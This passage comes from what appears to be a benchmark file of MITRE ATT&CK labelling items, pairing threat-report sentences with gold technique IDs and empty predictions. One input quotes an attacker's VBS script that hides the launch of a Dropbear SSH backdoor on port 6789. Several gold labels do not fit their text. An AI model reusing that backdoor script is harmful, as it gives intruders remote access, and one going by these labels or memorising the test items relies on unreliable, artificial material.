(TCP/80) Usage Timeframe Late 2015 Table 3: Sample 3 \u2013 Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective\n\t - T1082: System Information Discovery\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1569.002: System Services - Service Execution\n- Text: In the cases where Sakula does not use a registry key for persistence, it attempts to set itself up as a service (see Table 2). It invokes itself by calling WinExec with the \"net start %s\" argument (without quotes), where \"%s\" is the service name\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: UNC2452 has used WinRM via PowerShell to execute command and payloads on remote hosts.\n\t - T1021.006: Remote Services - Windows Remote Management\n", "input": "\ninstalls a service on the remote system, executes the command, then uninstalls the service.", "gold": "- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and passwords.\n\t - T1110.001: Brute Force - Password Guessing\n- Text: FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production\n\t - T1110.003: Brute Force - Password Spraying\n- Text: APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services\n\t - T1110: Brute Force\n", "input": "\nTG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions, and then brute forcing usernames and passwords", "gold": "- T1110: Brute Force", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing\n\t - T1203: Exploitation for Client Execution\n- Text: DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the \u201cattachedTemplate\u201d technique to load a template from a remote server.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Threat Group-3390 has lured victims into opening malicious files containing malware.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nThe attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the \u2018settings.xml\u2019 file that can be discovered in the \u2018Word\u2019 container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values\n\t - T1221: Template Injection\n- Text: APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.\n\t - T1216.001: System Script Proxy Execution - PubPrn\n- Text: Some versions have an embedded DLL known as MockDll that uses and regsvr32 to execute another payload.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", "input": "\nSecond, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \u201cscriptlet\u201d file, or .sct file, which is also embedded in the malicious RTF document", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Windigo has distributed Windows malware via drive-by downloads.\n\t - T1189: Drive-by Compromise\n- Text: Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.\n\t - T1608.004: Stage Capabilities - Drive-by Target\n- Text: APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.\n\t - T1584.004: Compromise Infrastructure - Server\n", "input": "\n[2] Threat groups use strategic web compromises (SWCs), also known as watering hole attacks, to target a wide array of potential victims", "gold": "- T1189: Drive-by Compromise", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can capture webcam data on Windows and macOS systems.\n\t - T1125: Video Capture\n- Text: The majority of documents used the name \u201cgerry knight\u201d for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names\n\t - T1102: Web Service\n- Text: Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.\n\t - T1102.001: Web Service - Dead Drop Resolver\n", "input": "\nMicrophone, Voice IP applications", "gold": "- T1123: Audio Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BloodHound can enumerate and collect the properties of domain computers, including domain controllers.\n\t - T1018: Remote System Discovery\n- Text: 2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: During FunnyDream, the threat actors used netstat to discover network connections on remote systems.\n\t - T1049: System Network Connections Discovery\n", "input": "\nperforms a connection test to discover remote systems in the network", "gold": "- T1018: Remote System Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416\u2019s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant\n\t - T1105: Ingress Tool Transfer\n- Text: LazyScripter has used PowerShell scripts to execute malicious code.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Olympic Destroyer attempts to copy itself to remote machines on the network.\n\t - T1570: Lateral Tool Transfer\n", "input": "\nUsing this information, they can decide to explore further or instruct the compromised computer to download additional malware", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rover takes screenshots of the compromised system's desktop and saves them to \"C:\\system\\screenshot.bmp\" for exfiltration every 60 minutes.\n\t - T1113: Screen Capture\n- Text: When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.\n\t - T1020: Automated Exfiltration\n- Text: Chrommme can set itself to sleep before requesting a new command from C2.\n\t - T1029: Scheduled Transfer\n", "input": "\nGet-TimedScreenshot Exfiltration module can take screenshots at regular intervals.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BoomBox can enumerate the username on a compromised host.\n\t - T1033: System Owner/User Discovery\n- Text: Agent Tesla can collect account information from the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Operation Wocao has used the \"net\" command to retrieve information about domain accounts.\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\ncollects the victim username along with other account information (account type, description, full name, SID and status).", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Next, the loader checks that it\u2019s not running in a virtualized environment (VMWare or Hyper-V) or under a debugger. For the hardware virtualization check, the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.\n\t - T1497: Virtualization/Sandbox Evasion\n", "input": "\nThe OopsIE payload checks to see if the result of this query as more than 0 elements to determine if it is running on a virtual machine", "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n- Text: Leviathan used ssh for internal reconnaissance.\n\t - T1021.004: Remote Services - SSH\n- Text: During Operation Dust Storm, the threat actors used Visual Basic scripts.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nIn the order to run the SSH server, the attackers created a VBS file with the following content: Set WshShell = CreateObject(\u201cWScript.Shell\u201d) WshShell.CurrentDirectory = \u201cC:\\WINDOWS\\TEMP\\Dropbear\\\u201d WshShell.Run \u201cdropbear.exe -r rsa -d dss -a -p 6789\u201d, 0, false As is evident here, the SSH server will accept connections on port number 6789", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a command to set certain attributes such as creation/modification timestamps on files.\n\t - T1070.006: Indicator Removal - Timestomp\n- Text: has used automated collection.\n\t - T1119: Automated Collection\n- Text: This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor\u2019s database\n\t - T1070: Indicator Removal\n\t - T1124: System Time Discovery\n", "input": "\nThis is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017", "gold": "- T1124: System Time Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication\n\t - T1090.004: Proxy - Domain Fronting\n- Text: uses DNS TXT records for C2.\n\t - T1071: Application Layer Protocol\n- Text: APT33 has used HTTP over TCP ports 808 and 880 for command and control.\n\t - T1571: Non-Standard Port\n", "input": "\ncan communicate using HTTP or HTTPS.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1055: Process Injection\n- Text: Gelsemium has the ability to inject DLLs into specific processes.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Upon execution, this Trojan checks to see if it was configured with \u201cBINDERON\u201d to determine if it should extract an embedded payload from a resource named \u201cB\u201d, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload\n\t - T1055.012: Process Injection - Process Hollowing\n", "input": "\ncan inject content into lsass.exe to load a module.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has exfiltrated data over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2.\n\t - T1020: Automated Exfiltration\n- Text: Rising Sun has used HTTP and HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nsends collected files back over same C2 channel.", "gold": "- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Hildegard has started a monero service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n- Text: When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"/Library/LaunchDaemons/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", "input": "\ninstalls itself as a service for persistence.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Axiom has targeted victims with remote administration tools including RDP.\n\t - T1563.002: Remote Service Session Hijacking - RDP Hijacking\n", "input": "\nThe group is known to have used RDP during operations.", "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Keydnap prompts the users for credentials.\n\t - T1056.002: Input Capture - GUI Input Capture\n- Text: APT29 has used repeated MFA requests to gain access to victim accounts.\n\t - T1621: Multi-Factor Authentication Request Generation\n- Text: OSX/Shlayer can escalate privileges to root by asking the user for credentials.\n\t - T1548.004: Abuse Elevation Control Mechanism - Elevated Execution with Prompt\n", "input": "\nprompts the users for credentials.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot has the ability to identify the OS version, OS bit information and computer name.\n\t - T1082: System Information Discovery\n- Text: Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.\n\t - T1592: Gather Victim Host Information\n\t - T1589: Gather Victim Identity Information\n\t - T1590: Gather Victim Network Information\n\t - T1125: Video Capture\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1056: Input Capture\n\t - T1113: Screen Capture\n\t - T1003: OS Credential Dumping\n- Text: Bisonal has added the exfiltrated data to the URL over the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\ncollects the victim host name and serial number, and then sends the information to the C2 server.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: FIN7 gathers information on network shares.\n\t - T1039: Data from Network Shared Drive\n- Text: The \"net use \\\\system\\share /delete\" command can be used in Net to remove an established connection to a network share.\n\t - T1070.005: Indicator Removal - Network Share Connection Removal\n", "input": "\nuses net.exe to connect to network shares using net use commands with compromised credentials.", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4.\n\t - T1001: Data Obfuscation\n- Text: Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.\n\t - T1001.002: Data Obfuscation - Steganography\n", "input": "\ncan use steganography to hide malicious code downloaded to the victim.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Ke3chang has used Mimikatz to generate Kerberos golden tickets.\n\t - T1558.001: Steal or Forge Kerberos Tickets - Golden Ticket\n- Text: Earth Lusca has used a \"DCSync\" command with Mimikatz to retrieve credentials from an exploited controller.\n\t - T1003.006: OS Credential Dumping - DCSync\n", "input": "\nstole domain credentials from Microsoft Active Directory Domain Controller and leveraged .", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: actors obtained a list of active processes on the victim and sent them to C2 servers.\n\t - T1057: Process Discovery\n- Text: Kwampirs collects a list of running services with the command \"tasklist /svc\".\n\t - T1007: System Service Discovery\n- Text: Aria-body has the ability to identify the titles of running windows on a compromised host.\n\t - T1010: Application Window Discovery\n", "input": "\ncan obtain a list of running processes on the system.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment.\n\t - T1133: External Remote Services\n- Text: leverages valid accounts after gaining credentials for use within the victim domain.\n\t - T1078: Valid Accounts\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n", "input": "\nVPN and to persist in same sentence", "gold": "- T1133: External Remote Services", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BloodHound can collect information about domain groups and members.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: PoshC2 can enumerate local and domain user account information.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\nhas used net user to conduct internal discovery of systems.", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the beginning of October 2021, Proofpoint researchers identified public samples of Gamaredon RTF template injection documents which impersonated the Ukrainian Ministry of Defense. This tactic is consistent with\u00a0reporting\u00a0on this APT group that links Gamaredon to the Russian FSB operating in the Republic of Crimea and the city of Sevastopol. The files communicate with the domain pretence77.glorious[.]nonima[.]ru which also was a remote template delivery URL used by several Microsoft Office Word documents that impersonated Ukrainian government organizations. These Office files communicate with actor infrastructure using a URI pattern previously observed among Gamaredon malicious Microsoft Office phishing documents. Specifically, the Microsoft Office documents used remote template injection to retrieve malicious payload files using URIs with the directory \u201c/ELENAPC/principles/\u201d on several occasions. Additionally, in several instances the resources retrieved delivered an MP3 file as a delivery resource\n\t - T1221: Template Injection\n- Text: After downloading and executing these files, one of the child processes created other files and the executable setup.exe/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure.\n\t - T1204.002: User Execution - Malicious File\n- Text: Email attacks often use \u201cclick-worthy\u201d or interesting topics to convince users to click links or open attachments that could lead to various threats\n\t - T1204: User Execution\n", "input": "\nThe file will be inflated in order to retrieve a RTF document, this document will be displayed to the infected user by executing Wordpad.Here is the PDB path from the PoohMilk sample:E:\\BIG_POOH\\Project\\milk\\Release\\milk.pdbFreenki SampleThe purpose of Freenki is to collect information on the infected system and to download a third executable", "gold": "- T1082: System Information Discovery\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated 